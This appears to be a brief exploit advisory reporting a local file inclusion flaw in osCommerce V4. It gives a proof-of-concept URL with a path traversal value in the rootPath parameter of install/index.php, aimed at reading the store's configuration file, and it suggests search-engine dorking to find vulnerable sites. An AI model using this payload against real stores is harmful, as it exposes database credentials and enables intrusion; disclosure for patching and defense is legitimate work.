osCommerce version 4 suffers from a local file inclusion vulnerability.
7cbd3f800121fbd6498c3dbdfab0d4d1fc70c2191d3bab9e42181076af739910
====================================================================================================================================
| # Title : oscommerce V4 LFI Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) |
| # Vendor : https://www.oscommerce.com/ |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Line 62 : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php
[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================